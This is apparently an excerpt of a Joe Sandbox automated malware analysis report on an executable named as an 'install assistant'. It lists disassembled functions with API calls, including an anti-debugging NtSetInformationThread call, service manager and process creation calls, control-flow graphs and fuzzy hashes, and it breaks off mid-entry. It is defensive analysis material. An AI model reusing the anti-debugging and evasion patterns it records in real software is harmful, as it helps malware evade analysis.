                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: f1d9a09b03d871a4bfc8a1d1f966dfe94b8e3449ae1fb3ba23ed26ad4eb5509f
                              • Instruction ID: 73bdd746698dbd51ad0c29fedd43fb02fca1cf5005d9ccc8d816839657f8f427
                              • Opcode Fuzzy Hash: f1d9a09b03d871a4bfc8a1d1f966dfe94b8e3449ae1fb3ba23ed26ad4eb5509f
                              • Instruction Fuzzy Hash: DD31E331145B09CBD330CF28C9847C6B7A3BFE6314F298E1DC0A65BA81DB7579099B51
                              Function 6C843D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: d6423219c6045e8363ed4b2b84a0ceda71253e8b226ea1519bb183a6c444d21d
                              • Instruction ID: d6c85fab5c5e9234c44fe5db14637455189bc0d3d97e6c56b00ff1646bb93e26
                              • Opcode Fuzzy Hash: d6423219c6045e8363ed4b2b84a0ceda71253e8b226ea1519bb183a6c444d21d
                              • Instruction Fuzzy Hash: 0731DF31108B09CBD734CF28C590796B7A7BFA6304F698E1DC0EA5BA81DB71B949CB51
                              Function 6C843C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 7d73c01b137f9e9aa3addbff1303ab473c817aa71188435bd30c44f84a06189e
                              • Instruction ID: ca865804c0c4920e2ec1f42751284879ca234729f0fa46d99ea6425dfb483988
                              • Opcode Fuzzy Hash: 7d73c01b137f9e9aa3addbff1303ab473c817aa71188435bd30c44f84a06189e
                              • Instruction Fuzzy Hash: A5210630118B09CBD338CF68C990796B7B7BF96305F28CE1DC0A64BA80DB75B9058B51
                              Function 6C9C5690 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C9C56A0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: f16abf0805bd84f058cafe310b46289e38330846df98a34e9796a7024b4e3010
                              • Instruction ID: 0cf7b1f27506604fd39de89e4030b90b327a170fb623c3bd79a8ee9687ac2ad7
                              • Opcode Fuzzy Hash: f16abf0805bd84f058cafe310b46289e38330846df98a34e9796a7024b4e3010
                              • Instruction Fuzzy Hash: 67312AB4608342EFC700CF28C584B4ABBF4AB89764F50895EF8C9C6361C371C945AB67
                              Function 6C9BB430 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C9BB44C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 3da0e6fcc75042416382af3428b24e064930a11ec6833bb4953ebe2373421327
                              • Instruction ID: cb0f4d39dc35f3be0abe899d6e5851619a731d2b9fd0f705b79ead84d5710f59
                              • Opcode Fuzzy Hash: 3da0e6fcc75042416382af3428b24e064930a11ec6833bb4953ebe2373421327
                              • Instruction Fuzzy Hash: 85112574508351AFD7008B29D58851EBBF5BF86314F148E59F4A8DBBD1D334CC848B06
                              Function 6C99AFA0 Relevance: 44.5, APIs: 3, Strings: 22, Instructions: 734fileCOMMON
                              Download Yara Rule
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C99B117
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 838b06ed7d677081cbe7800a5ca24ef29304a7feb384c37842022088351b1a22
                              • Instruction ID: b469dd3b7542884cdd2cb6e7d3b5af86fcafbbdb2f620d36a758855fbad167b5
                              • Opcode Fuzzy Hash: 838b06ed7d677081cbe7800a5ca24ef29304a7feb384c37842022088351b1a22
                              • Instruction Fuzzy Hash: D8624670609381CFC724CF28C490A5ABBF5ABD9315F288D1EE8A9CB755D739D8858B42
                              Function 6C9DD043 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6824 6c9dd043-6c9dd053 6825 6c9dd06d-6c9dd06f 6824->6825 6826 6c9dd055-6c9dd068 call 6c9cff4f call 6c9cff3c 6824->6826 6828 6c9dd075-6c9dd07b 6825->6828 6829 6c9dd3d4-6c9dd3e1 call 6c9cff4f call 6c9cff3c 6825->6829 6842 6c9dd3ec 6826->6842 6828->6829 6832 6c9dd081-6c9dd0a7 6828->6832 6847 6c9dd3e7 call 6c9d0690 6829->6847 6832->6829 6835 6c9dd0ad-6c9dd0b6 6832->6835 6838 6c9dd0b8-6c9dd0cb call 6c9cff4f call 6c9cff3c 6835->6838 6839 6c9dd0d0-6c9dd0d2 6835->6839 6838->6847 6840 6c9dd0d8-6c9dd0db 6839->6840 6841 6c9dd3d0-6c9dd3d2 6839->6841 6840->6841 6845 6c9dd0e1-6c9dd0e5 6840->6845 6846 6c9dd3ef-6c9dd3f2 6841->6846 6842->6846 6845->6838 6849 6c9dd0e7-6c9dd0fe 6845->6849 6847->6842 6853 6c9dd14f-6c9dd155 6849->6853 6854 6c9dd100-6c9dd103 6849->6854 6855 6c9dd11b-6c9dd132 call 6c9cff4f call 6c9cff3c call 6c9d0690 6853->6855 6856 6c9dd157-6c9dd161 6853->6856 6857 6c9dd105-6c9dd10e 6854->6857 6858 6c9dd113-6c9dd119 6854->6858 6889 6c9dd307 6855->6889 6859 6c9dd168-6c9dd186 call 6c9d4d65 call 6c9d4d2b * 2 6856->6859 6860 6c9dd163-6c9dd165 6856->6860 6861 6c9dd1d3-6c9dd1e3 6857->6861 6858->6855 6863 6c9dd137-6c9dd14a 6858->6863 6895 6c9dd188-6c9dd19e call 6c9cff3c call 6c9cff4f 6859->6895 6896 6c9dd1a3-6c9dd1cc call 6c9db1d9 6859->6896 6860->6859 6864 6c9dd1e9-6c9dd1f5 6861->6864 6865 6c9dd2a8-6c9dd2b1 call 6c9e1f55 6861->6865 6863->6861 6864->6865 6869 6c9dd1fb-6c9dd1fd 6864->6869 6879 6c9dd324 6865->6879 6880 6c9dd2b3-6c9dd2c5 6865->6880 6869->6865 6872 6c9dd203-6c9dd227 6869->6872 6872->6865 6877 6c9dd229-6c9dd23f 6872->6877 6877->6865 6882 6c9dd241-6c9dd243 6877->6882 6884 6c9dd328-6c9dd340 ReadFile 6879->6884 6880->6879 6881 6c9dd2c7-6c9dd2d6 GetConsoleMode 6880->6881 6881->6879 6886 6c9dd2d8-6c9dd2dc 6881->6886 6882->6865 6888 6c9dd245-6c9dd26b 6882->6888 6890 6c9dd39c-6c9dd3a7 GetLastError 6884->6890 6891 6c9dd342-6c9dd348 6884->6891 6886->6884 6892 6c9dd2de-6c9dd2f8 ReadConsoleW 6886->6892 6888->6865 6893 6c9dd26d-6c9dd283 6888->6893 6894 6c9dd30a-6c9dd314 call 6c9d4d2b 6889->6894 6898 6c9dd3a9-6c9dd3bb call 6c9cff3c call 6c9cff4f 6890->6898 6899 6c9dd3c0-6c9dd3c3 6890->6899 6891->6890 6897 6c9dd34a 6891->6897 6902 6c9dd319-6c9dd322 6892->6902 6903 6c9dd2fa GetLastError 6892->6903 6893->6865 6908 6c9dd285-6c9dd287 6893->6908 6894->6846 6895->6889 6896->6861 6901 6c9dd34d-6c9dd35f 6897->6901 6898->6889 6904 6c9dd3c9-6c9dd3cb 6899->6904 6905 6c9dd300-6c9dd306 call 6c9cff62 6899->6905 6901->6894 6911 6c9dd361-6c9dd365 6901->6911 6902->6901 6903->6905 6904->6894 6905->6889 6908->6865 6914 6c9dd289-6c9dd2a3 6908->6914 6918 6c9dd37e-6c9dd389 6911->6918 6919 6c9dd367-6c9dd377 call 6c9dd46e 6911->6919 6914->6865 6924 6c9dd38b call 6c9dd3f3 6918->6924 6925 6c9dd395-6c9dd39a call 6c9dd726 6918->6925 6930 6c9dd37a-6c9dd37c 6919->6930 6931 6c9dd390-6c9dd393 6924->6931 6925->6931 6930->6894 6931->6930
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 7d7c9fe6a48e9f71e27815b09bbf9f6e3954dddebccf5d510b7dee740bf2722d
                              • Instruction ID: 1edb91fe87557dd6f2c69766ca92fec8d39b32dd00e68c60a2a05f35a9465ded
                              • Opcode Fuzzy Hash: 7d7c9fe6a48e9f71e27815b09bbf9f6e3954dddebccf5d510b7dee740bf2722d
                              • Instruction Fuzzy Hash: CBC1F072A04A499FDB05CF98C880BADBBB4EF5A308F118159E424BBB81C770E905CF71
                              Function 6C9E45DC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6933 6c9e45dc-6c9e460c call 6c9e4a5c 6936 6c9e460e-6c9e4619 call 6c9cff4f 6933->6936 6937 6c9e4627-6c9e4633 call 6c9e1b7c 6933->6937 6944 6c9e461b-6c9e4622 call 6c9cff3c 6936->6944 6942 6c9e464c-6c9e4695 call 6c9e49c7 6937->6942 6943 6c9e4635-6c9e464a call 6c9cff4f call 6c9cff3c 6937->6943 6952 6c9e4697-6c9e46a0 6942->6952 6953 6c9e4702-6c9e470b GetFileType 6942->6953 6943->6944 6954 6c9e4901-6c9e4905 6944->6954 6958 6c9e46d7-6c9e46fd GetLastError call 6c9cff62 6952->6958 6959 6c9e46a2-6c9e46a6 6952->6959 6955 6c9e470d-6c9e473e GetLastError call 6c9cff62 CloseHandle 6953->6955 6956 6c9e4754-6c9e4757 6953->6956 6955->6944 6970 6c9e4744-6c9e474f call 6c9cff3c 6955->6970 6962 6c9e4759-6c9e475e 6956->6962 6963 6c9e4760-6c9e4766 6956->6963 6958->6944 6959->6958 6964 6c9e46a8-6c9e46d5 call 6c9e49c7 6959->6964 6967 6c9e476a-6c9e47b8 call 6c9e1d20 6962->6967 6963->6967 6968 6c9e4768 6963->6968 6964->6953 6964->6958 6975 6c9e47ba-6c9e47c6 call 6c9e4bd6 6967->6975 6976 6c9e47d7-6c9e47ff call 6c9e4c80 6967->6976 6968->6967 6970->6944 6975->6976 6982 6c9e47c8 6975->6982 6983 6c9e4804-6c9e4845 6976->6983 6984 6c9e4801-6c9e4802 6976->6984 6985 6c9e47ca-6c9e47d2 call 6c9dbe95 6982->6985 6986 6c9e4866-6c9e4874 6983->6986 6987 6c9e4847-6c9e484b 6983->6987 6984->6985 6985->6954 6990 6c9e48ff 6986->6990 6991 6c9e487a-6c9e487e 6986->6991 6987->6986 6989 6c9e484d-6c9e4861 6987->6989 6989->6986 6990->6954 6991->6990 6992 6c9e4880-6c9e48b3 CloseHandle call 6c9e49c7 6991->6992 6996 6c9e48e7-6c9e48fb 6992->6996 6997 6c9e48b5-6c9e48e1 GetLastError call 6c9cff62 call 6c9e1c8f 6992->6997 6996->6990 6997->6996
                              APIs
                                • Part of subcall function 6C9E49C7: CreateFileW.KERNEL32(00000000,00000000,?,6C9E4685,?,?,00000000,?,6C9E4685,00000000,0000000C), ref: 6C9E49E4
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E46F0
                              • __dosmaperr.LIBCMT ref: 6C9E46F7
                              • GetFileType.KERNEL32(00000000), ref: 6C9E4703
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E470D
                              • __dosmaperr.LIBCMT ref: 6C9E4716
                              • CloseHandle.KERNEL32(00000000), ref: 6C9E4736
                              • CloseHandle.KERNEL32(6C9DB640), ref: 6C9E4883
                              • GetLastError.KERNEL32 ref: 6C9E48B5
                              • __dosmaperr.LIBCMT ref: 6C9E48BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: 828e25f2ff41c8495babe60c4a300db9db5f61b17f78af6a1274fa8439ec51c9
                              • Instruction ID: c81f62f7c38d9ce639d3907a03f3904d96f814a02da326a5030f8d676f161c54
                              • Opcode Fuzzy Hash: 828e25f2ff41c8495babe60c4a300db9db5f61b17f78af6a1274fa8439ec51c9
                              • Instruction Fuzzy Hash: 99A11632A141498FCF0A9FA8CC5179D3BB5AF2B328F144159E821AF791C735D916CF52
                              Function 6C99C750 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 183COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7002 6c99c750-6c99c7a9 call 6c9c70e0 7005 6c99c7d0-6c99c7d9 7002->7005 7006 6c99c7db-6c99c7e0 7005->7006 7007 6c99c820-6c99c825 7005->7007 7008 6c99c860-6c99c865 7006->7008 7009 6c99c7e2-6c99c7e7 7006->7009 7010 6c99c8a0-6c99c8a5 7007->7010 7011 6c99c827-6c99c82c 7007->7011 7012 6c99c86b-6c99c870 7008->7012 7013 6c99c9a1-6c99c9b8 WriteFile 7008->7013 7016 6c99c7ed-6c99c7f2 7009->7016 7017 6c99c8e2-6c99c94f WriteFile 7009->7017 7014 6c99c9f9-6c99ca29 call 6c9cb910 7010->7014 7015 6c99c8ab-6c99c8b0 7010->7015 7018 6c99c832-6c99c837 7011->7018 7019 6c99c977-6c99c98b 7011->7019 7022 6c99c9c2-6c99c9ef call 6c9cbe90 ReadFile 7012->7022 7023 6c99c876-6c99c87b 7012->7023 7013->7022 7014->7005 7025 6c99ca2e-6c99ca33 7015->7025 7026 6c99c8b6-6c99c8dd 7015->7026 7027 6c99c959-6c99c96d WriteFile 7016->7027 7028 6c99c7f8-6c99c7fd 7016->7028 7017->7027 7020 6c99c7ab-6c99c7c0 7018->7020 7021 6c99c83d-6c99c842 7018->7021 7029 6c99c98f-6c99c99c 7019->7029 7033 6c99c7c3-6c99c7c8 7020->7033 7021->7005 7030 6c99c844-6c99c857 7021->7030 7022->7014 7023->7005 7032 6c99c881-6c99c89b 7023->7032 7025->7005 7035 6c99ca39-6c99ca47 7025->7035 7026->7033 7027->7019 7028->7005 7036 6c99c7ff-6c99c81a 7028->7036 7029->7005 7030->7033 7032->7029 7033->7005 7036->7033
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: 1ab72d555d8dcb7c7476ecf421390fc58935475e59bc13c574f6195f47cfbec3
                              • Instruction ID: 81205c862127201348217a2fc5a38793ba41a4b4a2000ed198655fce5249c9f8
                              • Opcode Fuzzy Hash: 1ab72d555d8dcb7c7476ecf421390fc58935475e59bc13c574f6195f47cfbec3
                              • Instruction Fuzzy Hash: E1716AB0208345AFD710DF19C880B9ABBF9BF8A708F54492EF488D6751D771D988CB92
                              Function 6C99BCA0 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 605COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: 81df74f99ed8a1077e4bc309adb61cbfd170bb3f09424893232a296e184d093c
                              • Instruction ID: 18d728207149ac5ccc03abcc05fcc3b75673dd935ace026cdcc5b740b075a51e
                              • Opcode Fuzzy Hash: 81df74f99ed8a1077e4bc309adb61cbfd170bb3f09424893232a296e184d093c
                              • Instruction Fuzzy Hash: 394247B460D3429FC728DF18C49061ABBF1AF99318F288D5EE59987B21D738D885CB53
                              Function 6C844200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: de4a16657532dc75325e96081602273036a86a5559aea8d6096557b069ca1ed2
                              • Instruction ID: 5c9b905cb8d057a779c5d9291805f397f1ea2b2c6ac5af820bdbeee4236eae8e
                              • Opcode Fuzzy Hash: de4a16657532dc75325e96081602273036a86a5559aea8d6096557b069ca1ed2
                              • Instruction Fuzzy Hash: A603E031645B018FC738CF28C9D0696B7E3AFE5328759CE6DC0A64BA95DB74B44ACB40
                              Function 6C9C5560 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7579 6c9c5560-6c9c55e7 CreateProcessA 7580 6c9c563a-6c9c5643 7579->7580 7581 6c9c5645-6c9c564a 7580->7581 7582 6c9c5660-6c9c567b 7580->7582 7583 6c9c564c-6c9c5651 7581->7583 7584 6c9c55f0-6c9c5632 WaitForSingleObject CloseHandle * 2 7581->7584 7582->7580 7583->7580 7585 6c9c5653-6c9c5688 7583->7585 7584->7580
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: 4e02491ee34529bdaf0639b6145304d7aeca6d07272c480d24f72b39657587d9
                              • Instruction ID: e6d7aa0afc8af52dfdf6e405d3c061ee88f99cf708781e144a4e51045c4cf99a
                              • Opcode Fuzzy Hash: 4e02491ee34529bdaf0639b6145304d7aeca6d07272c480d24f72b39657587d9
                              • Instruction Fuzzy Hash: 9531E2B09093808FD740DF28D29872ABBF0EB9A318F509A1DF8D996250E774D589CF47
                              Function 6C9DC1CE Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
